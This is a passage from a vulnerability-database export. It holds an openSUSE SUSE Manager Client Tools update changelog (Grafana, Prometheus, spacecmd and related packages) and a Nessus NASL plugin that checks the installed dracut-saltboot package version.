Changes from 6.4.0 Beta 2\n\n - Features / Enhancements\n\n - Azure Monitor: Remove support for cross resource queries\n (#19115)'. #19346, @sunker\n\n - Docker: Upgrade packages to resolve reported\n vulnerabilities. #19188, @marefr\n\n - Graphite: Time range expansion reduced from 1 minute to\n 1 second. #19246, @torkelo\n\n - grafana/toolkit: Add plugin creation task. #19207,\n @dprokop\n\n - Bug Fixes\n\n - Alerting: Prevents creating alerts from unsupported\n queries. #19250, @hugohaggmark\n\n - Alerting: Truncate PagerDuty summary when greater than\n 1024 characters. #18730, @nvllsvm\n\n - Cloudwatch: Fix autocomplete for Gamelift dimensions.\n #19146, @kevinpz\n\n - Dashboard: Fix export for sharing when panels use\n default data source. #19315, @torkelo\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Gauge/BarGauge: Fix issue with [object Object] in titles\n . #19217, @ryantxu\n\n - MSSQL: Revert usage of new connectionstring format\n introduced by #18384. #19203, @marefr\n\n - Multi-LDAP: Do not fail-fast on invalid credentials.\n #19261, @gotjosh\n\n - MySQL, Postgres, MSSQL: Fix validating query with\n template variables in alert . #19237, @marefr\n\n - MySQL, Postgres: Update raw sql when query builder\n updates. #19209, @marefr\n\n - MySQL: Limit datasource error details returned from the\n backend. #19373, @marefr\n\n - Changes from 6.4.0 Beta 1\n\n - Features / Enhancements\n\n - API: Readonly datasources should not be created via the\n API. #19006, @papagian\n\n - Alerting: Include configured AlertRuleTags in Webhooks\n notifier. #18233, @dominic-miglar\n\n - Annotations: Add annotations support to Loki. #18949,\n @aocenas\n\n - Annotations: Use a single row to represent a region.\n #17673, @ryantxu\n\n - Auth: Allow inviting existing users when login form is\n disabled. #19048, @548017\n\n - Azure Monitor: Add support for cross resource queries.\n #19115, @sunker\n\n - CLI: Allow installing custom binary plugins. #17551,\n @aocenas\n\n - Dashboard: Adds Logs Panel (alpha) as visualization\n option for Dashboards. #18641, @hugohaggmark\n\n - Dashboard: Reuse query results between panels . #16660,\n @ryantxu\n\n - Dashboard: Set time to to 23:59:59 when setting To time\n using calendar. #18595, @simPod\n\n - DataLinks: Add DataLinks support to Gauge, BarGauge and\n SingleStat2 panel. #18605, @ryantxu\n\n - DataLinks: Enable access to labels & field names.\n #18918, @torkelo\n\n - DataLinks: Enable multiple data links per panel. #18434,\n @dprokop\n\n - Docker: switch docker image to alpine base with\n phantomjs support. #18468, @DanCech\n\n - Elasticsearch: allow templating queries to order by\n doc_count. #18870, @hackery\n\n - Explore: Add throttling when doing live queries. #19085,\n @aocenas\n\n - Explore: Adds ability to go back to dashboard,\n optionally with query changes. #17982, @kaydelaney\n\n - Explore: Reduce default time range to last hour. #18212,\n @davkal\n\n - Gauge/BarGauge: Support decimals for min/max. #18368,\n @ryantxu\n\n - Graph: New series override transform constant that\n renders a single point as a line across the whole graph.\n #19102, @davkal\n\n - Image rendering: Add deprecation warning when PhantomJS\n is used for rendering images. #18933, @papagian\n\n - InfluxDB: Enable interpolation within ad-hoc filter\n values. #18077, @kvc-code\n\n - LDAP: Allow an user to be synchronized against LDAP.\n #18976, @gotjosh\n\n - Ldap: Add ldap debug page. #18759, @peterholmberg\n\n - Loki: Remove prefetching of default label values.\n #18213, @davkal\n\n - Metrics: Add failed alert notifications metric. #18089,\n @koorgoo\n\n - OAuth: Support JMES path lookup when retrieving user\n email. #14683, @bobmshannon\n\n - OAuth: return GitLab groups as a part of user info\n (enable team sync). #18388, @alexanderzobnin\n\n - Panels: Add unit for electrical charge - ampere-hour.\n #18950, @anirudh-ramesh\n\n - Plugin: AzureMonitor - Reapply MetricNamespace support.\n #17282, @raphaelquati\n\n - Plugins: better warning when plugins fail to load.\n #18671, @ryantxu\n\n - Postgres: Add support for scram sha 256 authentication.\n #18397, @nonamef\n\n - RemoteCache: Support SSL with Redis. #18511, @kylebrandt\n\n - SingleStat: The gauge option in now disabled/hidden\n (unless it's an old panel with it already enabled) .\n #18610, @ryantxu\n\n - Stackdriver: Add extra alignment period options. #18909,\n @sunker\n\n - Units: Add South African Rand (ZAR) to currencies.\n #18893, @jeteon\n\n - Units: Adding T,P,E,Z,and Y bytes. #18706, @chiqomar\n\n - Bug Fixes\n\n - Alerting: Notification is sent when state changes from\n no_data to ok. #18920, @papagian\n\n - Alerting: fix duplicate alert states when the alert\n fails to save to the database. #18216, @kylebrandt\n\n - Alerting: fix response popover prompt when add\n notification channels. #18967, @lzdw\n\n - CloudWatch: Fix alerting for queries with Id (using\n GetMetricData). #17899, @alex-berger\n\n - Explore: Fix auto completion on label values for Loki.\n #18988, @aocenas\n\n - Explore: Fixes crash using back button with a zoomed in\n graph. #19122, @hugohaggmark\n\n - Explore: Fixes so queries in Explore are only run if\n Graph/Table is shown. #19000, @hugohaggmark\n\n - MSSQL: Change connectionstring to URL format to fix\n using passwords with semicolon. #18384, @Russiancold\n\n - MSSQL: Fix memory leak when debug enabled. #19049,\n @briangann\n\n - Provisioning: Allow escaping literal '$' with '$$' in\n configs to avoid interpolation. #18045, @kylebrandt\n\n - TimePicker: Fixes hiding time picker dropdown in\n FireFox. #19154, @hugohaggmark\n\n - Breaking changes\n\n + Annotations There are some breaking changes in the\n annotations HTTP API for region annotations. Region\n annotations are now represented using a single event\n instead of two separate events. Check breaking changes\n in HTTP API below and HTTP API documentation for more\n details.\n\n + Docker Grafana is now using Alpine 3.10 as docker base\n image.\n\n + HTTP API\n\n - GET /api/alert-notifications now requires at least\n editor access. New /api/alert-notifications/lookup\n returns less information than /api/alert-notifications\n and can be access by any authenticated user.\n\n - GET /api/alert-notifiers now requires at least editor\n access\n\n - GET /api/org/users now requires org admin role. New\n /api/org/users/lookup returns less information than\n /api/org/users and can be access by users that are org\n admins, admin in any folder or admin of any team.\n\n - GET /api/annotations no longer returns regionId\n property.\n\n - POST /api/annotations no longer supports isRegion\n property.\n\n - PUT /api/annotations/:id no longer supports isRegion\n property.\n\n - PATCH /api/annotations/:id no longer supports isRegion\n property.\n\n - DELETE /api/annotations/region/:id has been removed.\n\n - Deprecation notes\n\n + PhantomJS\n\n - PhantomJS, which is used for rendering images of\n dashboards and panels, is deprecated and will be removed\n in a future Grafana release. A deprecation warning will\n from now on be logged when Grafana starts up if\n PhantomJS is in use. Please consider migrating from\n PhantomJS to the Grafana Image Renderer plugin.\n\n - Changes from 6.3.6\n\n - Features / Enhancements\n\n - Metrics: Adds setting for turning off total stats\n metrics. #19142, @marefr\n\n - Bug Fixes\n\n - Database: Rewrite system statistics query to perform\n better. #19178, @papagian\n\n - Explore: Fixes error when switching from prometheus to\n loki data sources. #18599, @kaydelaney\n\n - Rebase package spec. Use mostly from fedora, fix suse\n specified things and fix some errors.\n\n - Add missing directories provisioning/datasources and\n provisioning/notifiers and sample.yaml as described in\n packaging/rpm/control from upstream. Missing directories\n are shown in logfiles.\n\n - Version 6.3.5\n\n - Upgrades\n\n + Build: Upgrade to go 1.12.9.\n\n - Bug Fixes\n\n + Dashboard: Fixes dashboards init failed loading error\n for dashboards with panel links that had missing\n properties.\n\n + Editor: Fixes issue where only entire lines were being\n copied.\n\n + Explore: Fixes query field layout in splitted view for\n Safari browsers.\n\n + LDAP: multildap + ldap integration.\n\n + Profile/UserAdmin: Fix for user agent parser crashes\n grafana-server on 32-bit builds.\n\n + Prometheus: Prevents panel editor crash when switching\n to Prometheus datasource.\n\n + Prometheus: Changes brace-insertion behavior to be less\n annoying.\n\n - Version 6.3.4\n\n - Security: CVE-2019-15043 - Parts of the HTTP API allow\n unauthenticated use.\n\n - Version 6.3.3\n\n - Bug Fixes\n\n + Annotations: Fix failing annotation query when time\n series query is cancelled. #18532 1, @dprokop 1\n\n + Auth: Do not set SameSite cookie attribute if\n cookie_samesite is none. #18462 1, @papagian 3\n\n + DataLinks: Apply scoped variables to data links\n correctly. #18454 1, @dprokop 1\n\n + DataLinks: Respect timezone when displaying\n datapoint&rsquo;s timestamp in graph context menu.\n #18461 2, @dprokop 1\n\n + DataLinks: Use datapoint timestamp correctly when\n interpolating variables. #18459 1, @dprokop 1\n\n + Explore: Fix loading error for empty queries. #18488 1,\n @davkal\n\n + Graph: Fixes legend issue clicking on series line icon\n and issue with horizontal scrollbar being visible on\n windows. #18563 1, @torkelo 2\n\n + Graphite: Avoid glob of single-value array variables .\n #18420, @gotjosh\n\n + Prometheus: Fix queries with label_replace remove the $1\n match when loading query editor. #18480 5, @hugohaggmark\n 3\n\n + Prometheus: More consistently allows for multi-line\n queries in editor. #18362 2, @kaydelaney 2\n\n + TimeSeries: Assume values are all numbers. #18540 4,\n @ryantxu\n\n - Version 6.3.2\n\n - Bug Fixes\n\n + Gauge/BarGauge: Fixes issue with losts thresholds and\n issue loading Gauge with avg stat. #18375 12\n\n - Version 6.3.1\n\n - Bug Fixes\n\n + PanelLinks: Fix crash issue Gauge & Bar Gauge for panels\n with panel links (drill down links). #18430 2\n\n - Version 6.3.0\n\n - Features / Enhancements\n\n + OAuth: Do not set SameSite OAuth cookie if\n cookie_samesite is None. #18392 4, @papagian 3\n\n + Auth Proxy: Include additional headers as part of the\n cache key. #18298 6, @gotjosh\n\n + Build grafana images consistently. #18224 12,\n @hassanfarid\n\n + Docs: SAML. #18069 11, @gotjosh\n\n + Permissions: Show plugins in nav for non admin users but\n hide plugin configuration. #18234 1, @aocenas\n\n + TimePicker: Increase max height of quick range dropdown.\n #18247 2, @torkelo 2\n\n + Alerting: Add tags to alert rules. #10989 13, @Thib17 1\n\n + Alerting: Attempt to send email notifications to all\n given email addresses. #16881 1, @zhulongcheng\n\n + Alerting: Improve alert rule testing. #16286 2, @marefr\n\n + Alerting: Support for configuring content field for\n Discord alert notifier. #17017 2, @jan25\n\n + Alertmanager: Replace illegal chars with underscore in\n label names. #17002 5, @bergquist 1\n\n + Auth: Allow expiration of API keys. #17678, @papagian 3\n\n + Auth: Return device, os and browser when listing user\n auth tokens in HTTP API. #17504, @shavonn 1\n\n + Auth: Support list and revoke of user auth tokens in UI.\n #17434 2, @shavonn 1\n\n + AzureMonitor: change clashing built-in Grafana\n variables/macro names for Azure Logs. #17140, @shavonn 1\n\n + CloudWatch: Made region visible for AWS Cloudwatch\n Expressions. #17243 2, @utkarshcmu\n\n + Cloudwatch: Add AWS DocDB metrics. #17241, @utkarshcmu\n\n + Dashboard: Use timezone dashboard setting when exporting\n to CSV. #18002 1, @dehrax\n\n + Data links. #17267 11, @torkelo 2\n\n + Docker: Switch base image to ubuntu:latest from\n debian:stretch to avoid security issues&hellip; #17066\n 5, @bergquist 1\n\n + Elasticsearch: Support for visualizing logs in Explore .\n #17605 7, @marefr\n\n + Explore: Adds Live option for supported datasources.\n #17062 1, @hugohaggmark 3\n\n + Explore: Adds orgId to URL for sharing purposes. #17895\n 1, @kaydelaney 2\n\n + Explore: Adds support for new loki &lsquo;start&rsquo;\n and &lsquo;end&rsquo; params for labels endpoint.\n #17512, @kaydelaney 2\n\n + Explore: Adds support for toggling raw query mode in\n explore. #17870, @kaydelaney 2\n\n + Explore: Allow switching between metrics and logs .\n #16959 2, @marefr\n\n + Explore: Combines the timestamp and local time columns\n into one. #17775, @hugohaggmark 3\n\n + Explore: Display log lines context . #17097, @dprokop 1\n\n + Explore: Don&rsquo;t parse log levels if provided by\n field or label. #17180 1, @marefr\n\n + Explore: Improves performance of Logs element by\n limiting re-rendering. #17685, @kaydelaney 2\n\n + Explore: Support for new LogQL filtering syntax. #16674\n 4, @davkal\n\n + Explore: Use new TimePicker from Grafana/UI. #17793,\n @hugohaggmark 3\n\n + Explore: handle newlines in LogRow Highlighter. #17425,\n @rrfeng 1\n\n + Graph: Added new fill gradient option. #17528 3,\n @torkelo 2\n\n + GraphPanel: Don&rsquo;t sort series when legend table &\n sort column is not visible . #17095, @shavonn 1\n\n + InfluxDB: Support for visualizing logs in Explore.\n #17450 9, @hugohaggmark 3\n\n + Logging: Login and Logout actions (#17760). #17883 1,\n @ATTron\n\n + Logging: Move log package to pkg/infra. #17023,\n @zhulongcheng\n\n + Metrics: Expose stats about roles as metrics. #17469 2,\n @bergquist 1\n\n + MySQL/Postgres/MSSQL: Add parsing for day, weeks and\n year intervals in macros. #13086 6, @bernardd\n\n + MySQL: Add support for periodically reloading client\n certs. #14892, @tpetr\n\n + Plugins: replace dataFormats list with skipDataQuery\n flag in plugin.json. #16984, @ryantxu\n\n + Prometheus: Take timezone into account for step\n alignment. #17477, @fxmiii\n\n + Prometheus: Use overridden panel range for $__range\n instead of dashboard range. #17352, @patrick246\n\n + Prometheus: added time range filter to series labels\n query. #16851 3, @FUSAKLA\n\n + Provisioning: Support folder that doesn&rsquo;t exist\n yet in dashboard provisioning. #17407 1, @Nexucis\n\n + Refresh picker: Handle empty intervals. #17585 1,\n @dehrax\n\n + Singlestat: Add y min/max config to singlestat\n sparklines. #17527 4, @pitr\n\n + Snapshot: use given key and deleteKey. #16876,\n @zhulongcheng\n\n + Templating: Correctly display __text in multi-value\n variable after page reload. #17840 1, @EduardSergeev\n\n + Templating: Support selecting all filtered values of a\n multi-value variable. #16873 2, @r66ad\n\n + Tracing: allow propagation with Zipkin headers. #17009\n 4, @jrockway\n\n + Users: Disable users removed from LDAP. #16820 2,\n @alexanderzobnin\n\n - Bug Fixes\n\n + PanelLinks: Fix render issue when there is no panel\n description. #18408 3, @dehrax\n\n + OAuth: Fix &ldquo;missing saved state&rdquo; OAuth login\n failure due to SameSite cookie policy. #18332 1,\n @papagian 3\n\n + cli: fix for recognizing when in dev mode&hellip;\n #18334, @xlson\n\n + DataLinks: Fixes incorrect interpolation of\n $(__series_name) . #18251 1, @torkelo 2\n\n + Loki: Display live tailed logs in correct order in\n Explore. #18031 3, @kaydelaney 2\n\n + PhantomJS: Fixes rendering on Debian Buster. #18162 2,\n @xlson\n\n + TimePicker: Fixed style issue for custom range popover.\n #18244, @torkelo 2\n\n + Timerange: Fixes a bug where custom time ranges\n didn&rsquo;t respect UTC. #18248 1, @kaydelaney 2\n\n + remote_cache: Fix redis connstr parsing. #18204 1,\n @mblaschke\n\n + AddPanel: Fix issue when removing moved add panel widget\n . #17659 2, @dehrax\n\n + CLI: Fix encrypt-datasource-passwords fails with sql\n error. #18014, @marefr\n\n + Elasticsearch: Fix default max concurrent shard\n requests. #17770 4, @marefr\n\n + Explore: Fix browsing back to dashboard panel. #17061,\n @jschill\n\n + Explore: Fix filter by series level in logs graph.\n #17798, @marefr\n\n + Explore: Fix issues when loading and both graph/table\n are collapsed. #17113, @marefr\n\n + Explore: Fix selection/copy of log lines. #17121,\n @marefr\n\n + Fix: Wrap value of multi variable in array when coming\n from URL. #16992 1, @aocenas\n\n + Frontend: Fix for Json tree component not working.\n #17608, @srid12\n\n + Graphite: Fix for issue with alias function being moved\n last. #17791, @torkelo 2\n\n + Graphite: Fixes issue with seriesByTag & function with\n variable param. #17795, @torkelo 2\n\n + Graphite: use POST for /metrics/find requests. #17814 2,\n @papagian 3\n\n + HTTP Server: Serve Grafana with a custom URL path\n prefix. #17048 6, @jan25\n\n + InfluxDB: Fixes single quotes are not escaped in label\n value filters. #17398 1, @Panzki\n\n + Prometheus: Correctly escape &lsquo;|&rsquo; literals in\n interpolated PromQL variables. #16932, @Limess\n\n + Prometheus: Fix when adding label for metrics which\n contains colons in Explore. #16760, @tolwi\n\n + SinglestatPanel: Remove background color when value\n turns null. #17552 1, @druggieri\n\n - Make phantomjs dependency configurable\n\n - Create plugin directory and clean up (create in\n %install, add to %files) handling of /var/lib/grafana/*\n and\n\nkoan :\n\n - Calculate relative path for kernel and inited when\n generating grub entry (bsc#1170231)\n\n - Fix os-release version detection for SUSE\n\nmgr-cfg :\n\n - Remove commented code in test files\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Add mgr manpage links\n\nmgr-custom-info :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-daemon :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix systemd timer configuration on SLE12 (bsc#1142038)\n\nmgr-osad :\n\n - Separate osa-dispatcher and jabberd so it can be\n disabled independently\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Move /usr/share/rhn/config-defaults to uyuni-base-common\n\n - Require uyuni-base-common for /etc/rhn (for\n osa-dispatcher)\n\n - Ensure bytes type when using hashlib to avoid traceback\n (bsc#1138822)\n\nmgr-push :\n\n - Replace spacewalk-usix and spacewalk-backend-libs with\n uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nmgr-virtualization :\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix mgr-virtualization timer\n\nrhnlib :\n\n - Fix building\n\n - Fix malformed XML response when data contains non-ASCII\n chars (bsc#1154968)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Fix bootstrapping SLE11SP4 trad client with SSL enabled\n (bsc#1148177)\n\nspacecmd :\n\n - Only report real error, not result (bsc#1171687)\n\n - Use defined return values for spacecmd methods so\n scripts can check for failure (bsc#1171687)\n\n - Disable globbing for api subcommand to allow wildcards\n in filter settings (bsc#1163871)\n\n - Bugfix: attempt to purge SSM when it is empty\n (bsc#1155372)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Prevent error when piping stdout in Python 2\n (bsc#1153090)\n\n - Java api expects content as encoded string instead of\n encoded bytes like before (bsc#1153277)\n\n - Enable building and installing for Ubuntu 16.04 and\n Ubuntu 18.04\n\n - Add unit test for schedule, errata, user, utils, misc,\n configchannel and kickstart modules\n\n - Multiple minor bugfixes alongside the unit tests\n\n - Bugfix: referenced variable before assignment.\n\n - Add unit test for report, package, org, repo and group\n\nspacewalk-client-tools :\n\n - Add workaround for uptime overflow to\n spacewalk-update-status as well (bsc#1165921)\n\n - Spell correctly 'successful' and 'successfully'\n\n - Skip dmidecode data on aarch64 to prevent coredump\n (bsc#1113160)\n\n - Replace spacewalk-usix with uyuni-common-libs\n\n - Return a non-zero exit status on errors in rhn_check\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Make a explicit requirement to systemd for\n spacewalk-client-tools when rhnsd timer is installed\n\nspacewalk-koan :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\n - Require commands we use in merge-rd.sh\n\nspacewalk-oscap :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nspacewalk-remote-utils :\n\n - Update spacewalk-create-channel with RHEL 7.7 channel\n definitions\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsupportutils-plugin-susemanager-client :\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nsuseRegisterInfo :\n\n - SuseRegisterInfo only needs perl-base, not full perl\n (bsc#1168310)\n\n - Bump version to 4.1.0 (bsc#1154940)\n\nzypp-plugin-spacewalk :\n\n - 1.0.7\n\n - Prevent issue with non-ASCII characters in Python 2\n systems (bsc#1172462)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1113160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1138822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1142038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1148177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1153090\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1153277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1154940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1154968\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1155372\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1165921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1168310\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172462\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected SUSE Manager Client Tools package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dracut-saltboot\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"dracut-saltboot-0.1.1590413773.a959db7-lp152.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dracut-saltboot\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:dracut-saltboot"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-09-14T17:07:20", "differentElements": ["cvss2", "cvss3"], "edition": 4}, {"bulletin": {"id": "OPENSUSE-2020-1105.NASL", "hash": "35e9312ee86e65fcd9bb2b3a89768d69", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE Security Update : SUSE Manager Client Tools (openSUSE-2020-1105)", "description": "This update fixes the following issues :\n\ndracut-saltboot :\n\n - Print a list of available disk devices (bsc#1170824)\n\n - Install wipefs to initrd\n\n - Force install crypt modules\n\ngolang-github-prometheus-prometheus :\n\n - Update change log and spec file\n\n + Modified spec file: default to golang 1.14 to avoid\n 'have choice' build issues in OBS. \n\n + Rebase and update patches for version 2.18.0\n\n - Update to 2.18.0 \n\n + Features \n\n - Tracing: Added experimental Jaeger support #7148\n\n + Changes\n\n - Federation: Only use local TSDB for federation (ignore\n remote read). #7096\n\n - Rules: `rule_evaluations_total` and\n `rule_evaluation_failures_total` have a `rule_group`\n label now. #7094\n\n + Enhancements\n\n - TSDB: Significantly reduce WAL size kept around after a\n block cut. #7098\n\n - Discovery: Add `architecture` meta label for EC2. #7000\n\n + Bug fixes\n\n - UI: Fixed wrong MinTime reported by /status. #7182\n\n - React UI: Fixed multiselect legend on OSX. #6880\n\n - Remote Write: Fixed blocked resharding edge case. #7122\n\n - Remote Write: Fixed remote write not updating on relabel\n configs change. #7073\n\n - Changes from 2.17.2\n\n + Bug fixes\n\n - Federation: Register federation metrics #7081\n\n - PromQL: Fix panic in parser error handling #7132\n\n - Rules: Fix reloads hanging when deleting a rule group\n that is being evaluated #7138\n\n - TSDB: Fix a memory leak when prometheus starts with an\n empty TSDB WAL #7135\n\n - TSDB: Make isolation more robust to panics in web\n handlers #7129 #7136\n\n - Changes from 2.17.1\n\n + Bug fixes\n\n - TSDB: Fix query performance regression that increased\n memory and CPU usage #7051\n\n - Changes from 2.17.0\n\n + Features \n\n - TSDB: Support isolation #6841\n\n - This release implements isolation in TSDB. API queries\n and recording rules are guaranteed to only see full\n scrapes and full recording rules. This comes with a\n certain overhead in resource usage. Depending on the\n situation, there might be some increase in memory usage,\n CPU usage, or query latency.\n\n + Enhancements\n\n - PromQL: Allow more keywords as metric names #6933\n\n - React UI: Add normalization of localhost URLs in targets\n page #6794\n\n - Remote read: Read from remote storage concurrently #6770\n\n - Rules: Mark deleted rule series as stale after a reload\n #6745\n\n - Scrape: Log scrape append failures as debug rather than\n warn #6852\n\n - TSDB: Improve query performance for queries that\n partially hit the head #6676\n\n - Consul SD: Expose service health as meta label #5313\n\n - EC2 SD: Expose EC2 instance lifecycle as meta label\n #6914\n\n - Kubernetes SD: Expose service type as meta label for K8s\n service role #6684\n\n - Kubernetes SD: Expose label_selector and field_selector\n #6807\n\n - Openstack SD: Expose hypervisor id as meta label #6962\n\n + Bug fixes\n\n - PromQL: Do not escape HTML-like chars in query log #6834\n #6795\n\n - React UI: Fix data table matrix values #6896\n\n - React UI: Fix new targets page not loading when using\n non-ASCII characters #6892\n\n - Remote read: Fix duplication of metrics read from remote\n storage with external labels #6967 #7018\n\n - Remote write: Register WAL watcher and live reader\n metrics for all remotes, not just the first one #6998\n\n - Scrape: Prevent removal of metric names upon relabeling\n #6891\n\n - Scrape: Fix 'superfluous response.WriteHeader call'\n errors when scrape fails under some circonstances #6986\n\n - Scrape: Fix crash when reloads are separated by two\n scrape intervals #7011\n\n - Changes from 2.16.0\n\n + Features \n\n - React UI: Support local timezone on /graph #6692\n\n - PromQL: add absent_over_time query function #6490\n\n - Adding optional logging of queries to their own file\n #6520\n\n + Enhancements\n\n - React UI: Add support for rules page and 'Xs ago'\n duration displays #6503\n\n - React UI: alerts page, replace filtering togglers tabs\n with checkboxes #6543\n\n - TSDB: Export metric for WAL write errors #6647\n\n - TSDB: Improve query performance for queries that only\n touch the most recent 2h of data. #6651\n\n - PromQL: Refactoring in parser errors to improve error\n messages #6634\n\n - PromQL: Support trailing commas in grouping opts #6480\n\n - Scrape: Reduce memory usage on reloads by reusing scrape\n cache #6670\n\n - Scrape: Add metrics to track bytes and entries in the\n metadata cache #6675\n\n - promtool: Add support for line-column numbers for\n invalid rules output #6533\n\n - Avoid restarting rule groups when it is unnecessary\n #6450\n\n + Bug fixes\n\n - React UI: Send cookies on fetch() on older browsers\n #6553\n\n - React UI: adopt grafana flot fix for stacked graphs\n #6603\n\n - React UI: broken graph page browser history so that back\n button works as expected #6659\n\n - TSDB: ensure compactionsSkipped metric is registered,\n and log proper error if one is returned from head.Init\n #6616\n\n - TSDB: return an error on ingesting series with duplicate\n labels #6664\n\n - PromQL: Fix unary operator precedence #6579\n\n - PromQL: Respect query.timeout even when we reach\n query.max-concurrency #6712\n\n - PromQL: Fix string and parentheses handling in engine,\n which affected React UI #6612\n\n - PromQL: Remove output labels returned by absent() if\n they are produced by multiple identical label matchers\n #6493\n\n - Scrape: Validate that OpenMetrics input ends with `#\n EOF` #6505\n\n - Remote read: return the correct error if configs can't\n be marshal'd to JSON #6622\n\n - Remote write: Make remote client `Store` use passed\n context, which can affect shutdown timing #6673\n\n - Remote write: Improve sharding calculation in cases\n where we would always be consistently behind by tracking\n pendingSamples #6511\n\n - Ensure prometheus_rule_group metrics are deleted when a\n rule group is removed #6693\n\n - Changes from 2.15.2\n\n + Bug fixes\n\n - TSDB: Fixed support for TSDB blocks built with\n Prometheus before 2.1.0. #6564\n\n - TSDB: Fixed block compaction issues on Windows. #6547\n\n - Changes from 2.15.1\n\n + Bug fixes\n\n - TSDB: 